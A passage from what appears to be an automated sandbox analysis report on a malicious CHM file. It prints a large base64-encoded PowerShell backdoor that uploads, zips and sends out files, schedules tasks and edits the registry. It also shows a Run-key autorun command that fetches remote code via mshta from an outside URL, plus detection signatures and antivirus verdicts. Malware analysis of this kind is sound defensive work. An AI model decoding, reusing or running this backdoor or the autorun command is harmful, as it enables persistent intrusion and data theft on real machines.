B0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMwAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADMALgBMAGUAbgBnAHQAaAApADsAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAVQAuAFcAcgBpAHQAZQAoACQATAByAEIALAAgADAALAAgACQAYgB5AHQAZQBzAFIAZQBhAGQAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMwAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADMALgBMAGUAbgBnAHQAaAApADsAJABoAGUAYQBkAGkAbgBnADQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQAgACsAIAAkAFQAdwBvAEgAeQBwAGgAZQBuAHMAIAArACAAJABDAFIATABGACkAOwAkAGEAVgBOAHgAYQBkAEMAeABtAHQARQBRAEYAYQBVAC4AVwByAGkAdABlACgAJABoAGUAYQBkAGkAbgBnADQALAAgADAALAAgACQAaABlAGEAZABpAG4AZwA0AC4ATABlAG4AZwB0AGgAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBGAGwAdQBzAGgAKAApADsAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAVQAuAEMAbABvAHMAZQAoACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBzAHAAbwBuAHMAZQBdACAAJABSAEsAYwBsACAAPQAgACQAVgBmAHQAWQBaAEgALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAJABEAHkAYwBEACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAJABSAEsAYwBsAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQApADsAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAVQBMAFQAIAA9ACAAJABEAHkAYwBEAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAkAHMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQA7AH0AZgB1AG4AYwB0AGkAbwBuACAARABNAEUASABzAFEASwBWAFUAaAAoACQAQwB6AHIASAAsACAAJAB2AFAARQBhAHYAUgBPAGoAdgBuACkAewBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQAgACQAUgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJABDAHoAcgBIACkAOwAkAFIAZQBxAHUAZQBzAHQALgBzAGUAdABfAFQAaQBtAGUAbwB1AHQAKAAxADUAMAAwADAAKQA7ACQAUgBlAHMAcABvAG4AcwBlACAAPQAgACQAUgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkAOwAkAFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAgAD0AIAAkAFIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAOwAkAFMAcABsAGkAdABTAGkAegBlACAAPQAgADEAMAAyADQAOwAkAEIAdQBmAGYAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAEIAeQB0AGUAWwBdACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACQAUwBwAGwAaQB0AFMAaQB6AGUAOwBUAHIAeQAgAHsARABvACAAewAkAEMAbwB1AG4AdAAgAD0AIAAkAFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAEIAdQBmAGYAZQByACwAIAAwACwAIAAkAFMAcABsAGkAdABTAGkAegBlACkAOwAkAG8AZgBmAHMAZQB0ACAAPQAgACQAQwBvAHUAbgB0ACAALQAgADEAOwBBAGQAZAAtAEMAbwBuAHQAZQBuAHQAIAAkAHYAUABFAGEAdgBSAE8AagB2AG4AIAAkAEIAdQBmAGYAZQByAFsAMAAuAC4AJABvAGYAZgBzAGUAdABdACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlADsAfQAgAFUAbgB0AGkAbAAoACQAQwBvAHUAbgB0ACAALQBlAHEAIAAwACkAfQAgAEMAYQB0AGMAaAAgAHsAfQAgAEYAaQBuAGEAbABsAHkAIAB7ACQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtAC4ARABpAHMAcABvAHMAZQAoACkAOwB9AH0AZABvAHsAVAByAHkAewAkAGUAVgBqAFYATwBHAEkASwBNAEQAVQBDACAAPQAgAFgAYQBOAHMAWQBKAGIAWABqAFQAbgAgACQASABaAGcAcQBmAEIASwBYACAAJwAnADsASQBmACAAKAAkAGUAVgBqAFYATwBHAEkASwBNAEQAVQBDACAALQBuAGUAIAAnAG4AdQBsAGwAJwAgAC0AYQBuAGQAIAAkAGUAVgBqAFYATwBHAEkASwBNAEQAVQBDACAALQBuAGUAIAAnACcAKQB7ACQAZQBWAGoAVgBPAEcASQBLAE0ARABVAEMAPQAkAGUAVgBqAFYATwBHAEkASwBNAEQAVQBDAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAAxACwAIAAkAGUAVgBqAFYATwBHAEkASwBNAEQAVQBDAC4ATABlAG4AZwB0AGgAIAAtACAAMgApADsAJABjAGkAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAFYAagBWAE8ARwBJAEsATQBEAFUAQwApACkAOwBpAGYAIAAoACQAYwBpAGUAKQB7AGkAZgAgACgAJABjAGkAZQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAZgBpAGwAZQBpAG4AZgBvADoAJwApACkAewAkAE0AZQBqAFgAQwA9ACQAYwBpAGUALgBTAHUAYgBTAHQAcgBpAG4AZwAoADkAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAE0AZQBqAFgAQwApAHsAJABmAGkAbABlAG4AYQBtAGUAIAA9ACAAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAIAArACAAJwAuAGMAcwB2ACcAOwBHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAJABNAGUAagBYAEMAIAAtAEYAaQBsAHQAZQByACAAKgAuACoAIAAtAFIAZQBjAHUAcgBzAGUAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAE4AYQBtAGUALAAgAEwAZQBuAGcAdABoACwAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACwAIABGAHUAbABsAG4AYQBtAGUAIAB8ACAARQB4AHAAbwByAHQALQBDAHMAdgAgAC0AUABhAHQAaAAgACQAZgBpAGwAZQBuAGEAbQBlACAALQBGAG8AcgBjAGUAIAAtAE4AbwBUAHkAcABlAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAgAC0ARQBuAGMAbwBkAGkAbgBnACAAdQB0AGYAOAA7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAA9ACAAJwBfAGYAaQBsAGUAJwA7ACQAbgBvAHcAdABpAG0AZQAgAD0AIABHAGUAdAAtAEQAYQB0AGUAIAAtAEYAbwByAG0AYQB0ACAAeQB5AHkAeQAtAE0ATQAtAGQAZABfAEgASABfAG0AbQBfAHMAcwA7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAGYAaQBsAGUAbgBhAG0AZQAgAD0AIAAkAG4AbwB3AHQAaQBtAGUAIAArACAAJwBfAGYAaQBsAGUAaQBuAGYAbwAnADsARABqAFUAdQBpACAAJABIAFoAZwBxAGYAQgBLAFgAIAAkAGYAaQBsAGUAbgBhAG0AZQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGYAaQBsAGUAbgBhAG0AZQA7AH0AfQBpAGYAIAAoACQAYwBpAGUALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGQAaQByADoAJwApACkAewAkAE0AZQBqAFgAQwA9ACQAYwBpAGUALgBTAHUAYgBTAHQAcgBpAG4AZwAoADQAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAE0AZQBqAFgAQwApAHsAJABmAGkAbABlAG4AYQBtAGUAIAA9ACAAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAIAArACAAJwAuAHoAaQBwACcAOwBDAG8AbQBwAHIAZQBzAHMALQBBAHIAYwBoAGkAdgBlACAAJABNAGUAagBYAEMAIAAkAGYAaQBsAGUAbgBhAG0AZQAgAC0ARgBvAHIAYwBlADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgAD0AIAAnAF8AZgBpAGwAZQAnADsAJABuAG8AdwB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAB5AHkAeQB5AC0ATQBNAC0AZABkAF8ASABIAF8AbQBtAF8AcwBzADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAbgBvAHcAdABpAG0AZQAgACsAIAAnAF8AZABpAHIAJwA7AEQAagBVAHUAaQAgACQASABaAGcAcQBmAEIASwBYACAAJABmAGkAbABlAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBuAGEAbQBlACAAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABmAGkAbABlAG4AYQBtAGUAOwB9AH0AaQBmACAAKAAkAGMAaQBlAC4AQwBvAG4AdABhAGkAbgBzACgAJwBmAGkAbABlADoAJwApACkAewAkAE0AZQBqAFgAQwA9ACQAYwBpAGUALgBTAHUAYgBTAHQAcgBpAG4AZwAoADUAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAE0AZQBqAFgAQwApAHsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgAD0AIAAnAF8AZgBpAGwAZQAnADsAJABuAG8AdwB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAB5AHkAeQB5AC0ATQBNAC0AZABkAF8ASABIAF8AbQBtAF8AcwBzADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAbgBvAHcAdABpAG0AZQAgACsAIAAnAF8AZgBpAGwAZQAnADsARABqAFUAdQBpACAAJABIAFoAZwBxAGYAQgBLAFgAIAAkAE0AZQBqAFgAQwAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwB9AH0AaQBmACAAKAAkAGMAaQBlAC4AQwBvAG4AdABhAGkAbgBzACgAJwBkAG8AdwBuADoAJwApACkAewAkAE0AZQBqAFgAQwA9ACQAYwBpAGUALgBTAHUAYgBTAHQAcgBpAG4AZwAoADUAKQA7ACQAQwBoAGEAcgBBAHIAcgBhAHkAIAA9ACQATQBlAGoAWABDAC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADMAKQB7AEQATQBFAEgAcwBRAEsAVgBVAGgAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAAJABDAGgAYQByAEEAcgByAGEAeQBbADIAXQA7ACQAcwBFAEsAYwBEAFgAcgBZAGEASQBWAHcAZgAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AFgAYQBOAHMAWQBKAGIAWABqAFQAbgAgACQASABaAGcAcQBmAEIASwBYACAAJABzAEUASwBjAEQAWAByAFkAYQBJAFYAdwBmADsAfQB9AGkAZgAgACgAJABjAGkAZQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAcgBlAGcAZQBkAGkAdAA6ACcAKQApAHsAJABNAGUAagBYAEMAPQAkAGMAaQBlAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA4ACkAOwAkAEMAaABhAHIAQQByAHIAYQB5ACAAPQAkAE0AZQBqAFgAQwAuAFMAcABsAGkAdAAoACcAfAB8ACcAKQA7AGkAZgAgACgAJABDAGgAYQByAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAA1ACkAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgAC0ATgBhAG0AZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AIAAtAFYAYQBsAHUAZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwA0AF0AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQA7ACQAcwBFAEsAYwBEAFgAcgBZAGEASQBWAHcAZgAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AFgAYQBOAHMAWQBKAGIAWABqAFQAbgAgACQASABaAGcAcQBmAEIASwBYACAAJABzAEUASwBjAEQAWAByAFkAYQBJAFYAdwBmADsAfQB9AGkAZgAgACgAJABjAGkAZQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAdABhAHMAawA6ACcAKQApAHsAJABNAGUAagBYAEMAPQAkAGMAaQBlAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA1ACkAOwAkAEMAaABhAHIAQQByAHIAYQB5ACAAPQAkAE0AZQBqAFgAQwAuAFMAcABsAGkAdAAoACcAfAB8ACcAKQA7AGkAZgAgACgAJABDAGgAYQByAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAA1ACkAewAkAEEAYwB0AGkAbwBuACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwA0AF0AOwAkAFMAZQB0AHQAaQBuAGcAcwAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ADsAJAB0AHIAaQBnAGcAZQByACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBPAG4AYwBlACAALQBBAHQAIAAoAEcAZQB0AC0ARABhAHQAZQApACAALQBSAGUAcABlAHQAaQB0AGkAbwBuAEkAbgB0AGUAcgB2AGEAbAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBNAGkAbgB1AHQAZQBzACAAMQAwACkAOwAkAFQAYQBzAGsAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACQAQQBjAHQAaQBvAG4AIAAtAFQAcgBpAGcAZwBlAHIAIAAkAFQAcgBpAGcAZwBlAHIAIAAtAFMAZQB0AHQAaQBuAGcAcwAgACQAUwBlAHQAdABpAG4AZwBzADsAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADIAXQAgAC0AVABhAHMAawBQAGEAdABoACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgAC0ASQBuAHAAdQB0AE8AYgBqAGUAYwB0ACAAJABUAGEAcwBrADsAJABzAEUASwBjAEQAWAByAFkAYQBJAFYAdwBmACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAWABhAE4AcwBZAEoAYgBYAGoAVABuACAAJABIAFoAZwBxAGYAQgBLAFgAIAAkAHMARQBLAGMARABYAHIAWQBhAEkAVgB3AGYAOwB9AH0AaQBmACAAKAAkAGMAaQBlAC4AQwBvAG4AdABhAGkAbgBzACgAJwB6AGkAcAA6ACcAKQApAHsAJABNAGUAagBYAEMAPQAkAGMAaQBlAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA0ACkAOwAkAEMAaABhAHIAQQByAHIAYQB5ACAAPQAkAE0AZQBqAFgAQwAuAFMAcABsAGkAdAAoACcAfAB8ACcAKQA7AGkAZgAgACgAJABDAGgAYQByAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAzACkAewBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAAJABDAGgAYQByAEEAcgByAGEAeQBbADIAXQA7ACQAcwBFAEsAYwBEAFgAcgBZAGEASQBWAHcAZgAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AFgAYQBOAHMAWQBKAGIAWABqAFQAbgAgACQASABaAGcAcQBmAEIASwBYACAAJABzAEUASwBjAEQAWAByAFkAYQBJAFYAdwBmADsAfQB9AGkAZgAgACgAJABjAGkAZQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAcgBlAG4AYQBtAGUAOgAnACkAKQB7ACQATQBlAGoAWABDAD0AJABjAGkAZQAuAFMAdQBiAFMAdAByAGkAbgBnACgANwApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABNAGUAagBYAEMALgBTAHAAbABpAHQAKAAnAHwAfAAnACkAOwBpAGYAIAAoACQAQwBoAGEAcgBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAAgAC0AZQBxACAAMwApAHsAUgBlAG4AYQBtAGUALQBJAHQAZQBtACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AOwAkAHMARQBLAGMARABYAHIAWQBhAEkAVgB3AGYAIAA9ACAAJwBSAD0AJwAgACsAIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJwBvAGsAJwApACkAOwBYAGEATgBzAFkASgBiAFgAagBUAG4AIAAkAEgAWgBnAHEAZgBCAEsAWAAgACQAcwBFAEsAYwBEAFgAcgBZAGEASQBWAHcAZgA7AH0AfQBpAGYAIAAoACQAYwBpAGUALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGQAZQBsADoAJwApACkAewAkAE0AZQBqAFgAQwA9ACQAYwBpAGUALgBTAHUAYgBTAHQAcgBpAG4AZwAoADQAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAE0AZQBqAFgAQwApAHsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABNAGUAagBYAEMAOwAkAHMARQBLAGMARABYAHIAWQBhAEkAVgB3AGYAIAA9ACAAJwBSAD0AJwAgACsAIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJwBvAGsAJwApACkAOwBYAGEATgBzAFkASgBiAFgAagBUAG4AIAAkAEgAWgBnAHEAZgBCAEsAWAAgACQAcwBFAEsAYwBEAFgAcgBZAGEASQBWAHcAZgA7AH0AfQB9AH0AfQAgAEMAYQB0AGMAaAB7AH0AUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AdwBoAGkAbABlACgAJAB0AHIAdQBlACAALQBlAHEAIAAkAHQAcgB1AGUAKQA= filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 2668 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x000007fffff90000 process_handle: 0xffffffffffffffff	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 4, 2023, 10:28 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (16 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fGZtM

reg_value

c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 391763 2.2.2.2 || mshta http://navercorp.ru/dashboard/image/202302/4.html

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Sept. 4, 2023, 10:28 a.m.	key_handle: 0x00000000000002c8 regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

File has been identified by 14 AntiVirus engines on VirusTotal as malicious (14 events)

Sangfor	Trojan.Generic-Script.Save.f8c288c6
K7AntiVirus	Trojan ( 0001140e1 )
K7GW	Trojan ( 0001140e1 )
ESET-NOD32	HTML/TrojanDownloader.Agent.NLW
TrendMicro-HouseCall	TROJ_FRS.VSNTI123
Avast	Other:Malware-gen [Trj]
Kaspersky	HEUR:Trojan-Downloader.Script.Agent.gen
Rising	Trojan.MouseJack/HTML!1.BE26 (CLASSIC)
TrendMicro	TROJ_FRS.VSNTI123
McAfee-GW-Edition	Artemis!Trojan
ZoneAlarm	HEUR:Trojan-Downloader.Script.Agent.gen
AhnLab-V3	Trojan/HTML.RUNNER.S2208
Tencent	Win32.Trojan-Downloader.Ader.Bplw
AVG	Other:Malware-gen [Trj]

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2556 resumed a thread in remote process 2668
Process injection	Process 2880 resumed a thread in remote process 3040
NtResumeThread Sept. 4, 2023, 10:27 a.m.	thread_handle: 0x00000284 suspend_count: 1 process_identifier: 2668	1	0	0
NtResumeThread Sept. 4, 2023, 10:28 a.m.	thread_handle: 0x0000000000000410 suspend_count: 1 process_identifier: 3040	1	0	0

Creates a suspicious Powershell process (4 events)

option	-ep bypass	value	Attempts to bypass execution policy
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-ep bypass	value	Attempts to bypass execution policy
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (19 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Fukushima.chm

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All